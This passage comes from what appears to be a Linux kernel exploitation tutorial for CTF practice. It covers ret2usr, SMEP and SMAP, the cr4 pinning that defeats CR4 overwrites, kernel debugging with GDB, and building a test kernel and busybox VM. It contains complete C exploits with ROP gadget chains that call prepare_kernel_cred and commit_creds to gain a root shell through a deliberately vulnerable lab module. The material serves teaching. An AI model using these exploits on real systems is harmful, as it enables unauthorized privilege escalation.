GS is changed back via the swapgs instruction. All others are changed back via iretq, the QWORD variant of the iret family of intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:

Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.

Final Exploit

The final version

// gcc -static -o exploit exploit.c

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

void get_shell(void){
    puts("[*] Returned to userland");
    system("/bin/sh");
}

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

uint64_t user_rip = (uint64_t) get_shell;

void save_state(){
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	    "call rcx;"
        
        "mov rdi, rax;"
	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
	    "call rcx;"

        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

int main() {
    save_state();

    // communicate with the module
    int fd = open("/dev/kernel_rop", O_RDWR);
    printf("FD: %d\n", fd);

    // overflow
    uint64_t payload[7];

    payload[6] = (uint64_t) escalate;

    write(fd, payload, 0);
}

Debugging a Kernel Module

A practical example

Trying on the Latest Kernel

Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:

commit_creds           0xffffffff81077390
prepare_kernel_cred    0xffffffff81077510

The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.

Instead of an elevated shell, we get a kernel panic, with the following data dump:

[    1.472064] BUG: kernel NULL pointer dereference, address: 0000000000000000
[    1.472064] #PF: supervisor read access in kernel mode
[    1.472064] #PF: error_code(0x0000) - not-present page
[    1.472064] PGD 22d9067 P4D 22d9067 PUD 22da067 PMD 0 
[    1.472064] Oops: Oops: 0000 [#1] SMP
[    1.472064] CPU: 0 PID: 32 Comm: exploit Tainted: G        W  O       6.10.0-rc5 #7
[    1.472064] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[    1.472064] RIP: 0010:commit_creds+0x29/0x180
[    1.472064] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[    1.472064] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[    1.472064] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[    1.472064] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[    1.472064] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[    1.472064] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[    1.472064] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[    1.472064] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[    1.472064] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.472064] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[    1.472064] Call Trace:
[    1.472064]  <TASK>
[    1.472064]  ? show_regs+0x64/0x70
[    1.472064]  ? __die+0x24/0x70
[    1.472064]  ? page_fault_oops+0x14b/0x420
[    1.472064]  ? search_extable+0x2b/0x30
[    1.472064]  ? commit_creds+0x29/0x180
[    1.472064]  ? search_exception_tables+0x4f/0x60
[    1.472064]  ? fixup_exception+0x26/0x2d0
[    1.472064]  ? kernelmode_fixup_or_oops.constprop.0+0x58/0x70
[    1.472064]  ? __bad_area_nosemaphore+0x15d/0x220
[    1.472064]  ? find_vma+0x30/0x40
[    1.472064]  ? bad_area_nosemaphore+0x11/0x20
[    1.472064]  ? exc_page_fault+0x284/0x5c0
[    1.472064]  ? asm_exc_page_fault+0x2b/0x30
[    1.472064]  ? abort_creds+0x30/0x30
[    1.472064]  ? commit_creds+0x29/0x180
[    1.472064]  ? x64_sys_call+0x146c/0x1b10
[    1.472064]  ? do_syscall_64+0x50/0x110
[    1.472064]  ? entry_SYSCALL_64_after_hwframe+0x4b/0x53
[    1.472064]  </TASK>
[    1.472064] Modules linked in: kernel_rop(O)
[    1.472064] CR2: 0000000000000000
[    1.480065] ---[ end trace 0000000000000000 ]---
[    1.480065] RIP: 0010:commit_creds+0x29/0x180
[    1.480065] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[    1.484065] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[    1.484065] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[    1.484065] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[    1.484065] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[    1.484065] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[    1.484065] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[    1.484065] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[    1.484065] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.484065] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[    1.488065] Kernel panic - not syncing: Fatal exception
[    1.488065] Kernel Offset: disabled
[    1.488065] ---[ end Kernel panic - not syncing: Fatal exception ]---

I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while trying to get the previous section working, so it happens to all of us!

One thing that we can notice is that, the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds():

[    1.480065] RIP: 0010:commit_creds+0x29/0x180

We can check the source here, but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!

Opening a GDBserver

In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.

What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.

$ gdb kernel_rop.ko
pwndbg> target remote :1234
pwndbg> b *0xffffffff81077390

We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:

pwndbg> info reg rdi
rdi            0x0                 0

This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:

pwndbg> info reg rax
rax            0x0                 0

This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!

Let's compare the differences in prepare_kernel_cred() code between kernel version 6.1 and version 6.10:

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);

	validate_creds(old);

	*new = *old;
	new->non_rcu = 0;
	atomic_long_set(&new->usage, 1);
	set_cred_subscribers(new, 0);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);

	// [...]
	
	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;

	put_cred(old);
	validate_creds(new);
	return new;

error:
	put_cred(new);
	put_cred(old);
	return NULL;
}

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	if (WARN_ON_ONCE(!daemon))
		return NULL;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	old = get_task_cred(daemon);

	*new = *old;
	new->non_rcu = 0;
	atomic_long_set(&new->usage, 1);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);

	// [...]

	new->ucounts = get_ucounts(new->ucounts);
	if (!new->ucounts)
		goto error;

	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;

	put_cred(old);
	return new;

error:
	put_cred(new);
	put_cred(old);
	return NULL;
}

The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task:

if (daemon)
    old = get_task_cred(daemon);
else
    old = get_cred(&init_cred);

i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:

if (WARN_ON_ONCE(!daemon))
    return NULL;

If daemon is NULL, return NULL - hence our issue!

Unfortunately, there's no way to bypass this easily! We can fake cred structs, and if we can leak init_task we can use that memory address as well, but it's no longer as simple as calling prepare_kernel_cred(0)!

SMEP

Supervisor Memory Execute Protection

If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).

In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.

We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):

    -cpu qemu64,+smep

Kernel ROP - Disabling SMEP

An old technique

Setup

Using the same setuo as ret2usr, we make one single modification in run.sh:

#!/bin/sh

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic nokaslr pti=off" \
    -monitor /dev/null \
    -nographic \
    -no-reboot \
    -smp cores=2 \
    -cpu qemu64,+smep \        # add this line
    -s

Now if we load the VM and run our exploit from last time, we get a kernel panic.

Kernel Panic

[    1.628455] Yes? �U"��
[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode
[    1.635878] #PF: error_code(0x0011) - permissions violation
[    1.637930] PGD 1296067 P4D 1296067 PUD 1295067 PMD 1291067 PTE 7c52025
[    1.639639] Oops: 0011 [#1] SMP
[    1.640632] CPU: 0 PID: 30 Comm: exploit Tainted: G           O       6.1.0 #6
[    1.646144] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[    1.647030] RIP: 0010:0x4016b9
[    1.648108] Code: Unable to access opcode bytes at 0x40168f.
[    1.648952] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.649603] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.650321] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.651031] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.651743] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.652455] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.653218] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.654086] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.655452] Call Trace:
[    1.656167]  <TASK>
[    1.656846]  ? do_syscall_64+0x3d/0x90
[    1.658073]  ? entry_SYSCALL_64_after_hwframe+0x46/0xb0
[    1.660144]  </TASK>
[    1.660835] Modules linked in: kernel_rop(O)
[    1.662360] CR2: 00000000004016b9
[    1.663362] ---[ end trace 0000000000000000 ]---
[    1.664702] RIP: 0010:0x4016b9
[    1.665386] Code: Unable to access opcode bytes at 0x40168f.
[    1.666167] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.668501] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.669777] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.670710] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.672122] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.672795] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.673471] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.673854] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.674124] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.674576] Kernel panic - not syncing: Fatal exception
[    1.689999] Kernel Offset: 0x36200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[    1.695855] ---[ end Kernel panic - not syncing: Fatal exception ]---

It's worth noting what it looks like for the future - especially these 3 lines:

[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode

Overwriting CR4

So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val). This function quite literally overwrites CR4.

Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):

~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4

Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:

[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0

CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.

The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. To do this, we can run extract-vmlinux, from the official Linux git repository.

$ ./extract-vmlinux bzImage > vmlinux
$ file vmlinux 
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=3003c277e62b32aae3cfa84bb0d5775bd2941b14, stripped

$ ropper -f vmlinux --search "pop rdi"
0xffffffff811e08ec: pop rdi; ret;

Putting it all together

All that changes in the exploit is the overflow:

// overflow
uint64_t payload[20];

int i = 6;

payload[i++] = 0xffffffff811e08ec;      // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0;      // native_write_cr4
payload[i++] = (uint64_t) escalate;

write(fd, payload, 0);

We can then compile it and run.

Failure

This fails. Why?

If we look at the resulting kernel panic, we meet an old friend:

[    1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[    1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[    1.547037] #PF: supervisor instruction fetch in kernel mode

SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4(). What gives?

Well, if we look at the source, there's another feature:

void __no_profile native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}

Essentially, it will check if the val that we input disables any of the bits defined in cr4_pinned_bits. This value is set on boot, and effectively stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.

Kernel ROP - Privilege Escalation in Kernel Space

Bypassing SMEP by ropping through the kernel

The previous approach failed, so let's try and escalate privileges using purely ROP.

Modifying the Payload

Calling prepare_kernel_cred()

First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):

uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq_pop1 =  0xffffffff81022e1f;

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

int main() {
    // [...]

    // overflow
    uint64_t payload[7];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;
    
    // [...]
}

Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds().

Moving RAX to RDI for commit_creds()

This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!

I ended up combining these four gadgets:

0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne and hit the ret

uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

// [...]

// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;

Returning to userland

Recall that we need swapgs and then iretq. Both can be found easily.

0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;

The pop rbp; ret is not important as iretq jumps away anyway.

To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.

// commit_creds()
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;

payload[i++] = (uint64_t) escalate;

If we try this now, we successfully escalate privileges!

Final Exploit

// gcc -static -o exploit exploit.c

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

void get_shell(void){
    puts("[*] Returned to userland");
    system("/bin/sh");
}

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

uint64_t user_rip = (uint64_t) get_shell;

void save_state(){
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	    "call rcx;"
        
        "mov rdi, rax;"
	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
	    "call rcx;"

        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq      =  0xffffffff81022e1f;              // iretq; pop rbp; ret

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

int main() {
    save_state();

    // communicate with the module
    int fd = open("/dev/kernel_rop", O_RDWR);
    printf("FD: %d\n", fd);

    // overflow
    uint64_t payload[25];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;

    // commit_creds()
    payload[i++] = pop_rdx;
    payload[i++] = 0;
    payload[i++] = mov_rcx_rax;
    payload[i++] = mov_rdx_rcx;
    payload[i++] = mov_rdi_rax;
    payload[i++] = commit_creds;
        

    // commit_creds()
    payload[i++] = swapgs;
    payload[i++] = iretq;
    payload[i++] = user_rip;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_rsp;
    payload[i++] = user_ss;

    payload[i++] = (uint64_t) escalate;

    write(fd, payload, 0);
}

SMAP

Supervisor Memory Access Protection

SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being accessed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is a set of very specific functions.

For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.

This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).

Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also , so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.

Enabling SMAP is just as easy as SMEP:

modprobe_path

KASLR

TODO

KPTI

Compiling, Customising and booting the Kernel

Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.

Prerequisites

$ apt-get install flex bison libelf-dev

There may be other requirements, I just already had them. Check here for the full list.

The Kernel

Cloning

git clone https://github.com/torvalds/linux --depth=1

Use --depth 1 to only get the last commit.

Customise

Remove the current compilation configurations, as they are quite complex for our needs

$ cd linux
$ rm -f .config

Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.

$ make allnoconfig
  YACC    scripts/kconfig/parser.tab.[ch]
  HOSTCC  scripts/kconfig/lexer.lex.o
  HOSTCC  scripts/kconfig/menu.o
  HOSTCC  scripts/kconfig/parser.tab.o
  HOSTCC  scripts/kconfig/preprocess.o
  HOSTCC  scripts/kconfig/symbol.o
  HOSTCC  scripts/kconfig/util.o
  HOSTLD  scripts/kconfig/conf
#
# configuration written to .config
#

We create a kconfig file with the options we want to enable. An example is the following:

CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y

CONFIG_PCI=y

# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y

# This is for /dev file system.
CONFIG_DEVTMPFS=y

# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y

CONFIG_MODULES=y

CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y

CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y

CONFIG_USERFAULTFD=y

Explanation of Options

CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - simultaneous multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging
CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - TODO
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space

In order to update the minimal .config with these options, we use the provided merge_config.sh script:

$ scripts/kconfig/merge_config.sh .config ../kconfig

Building

$ make -j4

That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.

Kernel Modules

When we compile kernel modules for our own kernel, we use the following Makefile structure:

all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:

all:
    make -C /home/ir0nstone/linux M=$(PWD) modules

The module is now compiled for the specific kernel version!

Booting the Kernel in a Virtual Machine

References

Creating the File System and Executables

We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.

To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.

We will download and extract busybox; you can find the latest version here.

$ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -

We also create an output folder for compiled versions.

$ mkdir busybox_compiled

Now compile it statically. We're going to use the menuconfig option, so we can make some choices.

$ cd busybox-1.36.1
$ make O=../busybox_compiled menuconfig

Now, make it with the new options

$ cd ../busybox_compiled
$ make -j
$ make install

Now we make the file system.

$ cd ..
$ mkdir initramfs
$ cd initramfs
$ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
$ cp -av ../busybox_compiled/_install/* .
$ sudo cp -av /dev/{null,console,tty,sda1} dev/

The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:

#!/bin/sh
 
mount -t proc none /proc
mount -t sysfs none /sys
 
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
 
exec /bin/sh

Make it executable

$ chmod +x init

Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.

find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio

The -not -name *.cpio is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises

If we want to extract the cpio archive (say, during a CTF) we can use this command:

$ cpio -i -F initramfs.cpio

Loading it with QEMU

Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:

#!/bin/sh

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Explanation of Flags

-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - basic features; in the future, this flag is also used to set protections
- console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)
- quiet - Only showing critical messages from the kernel
- loglevel=3 - Only show error messages and higher-priority messages
- oops=panic - Make the kernel panic immediately on an oops (kernel error)
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
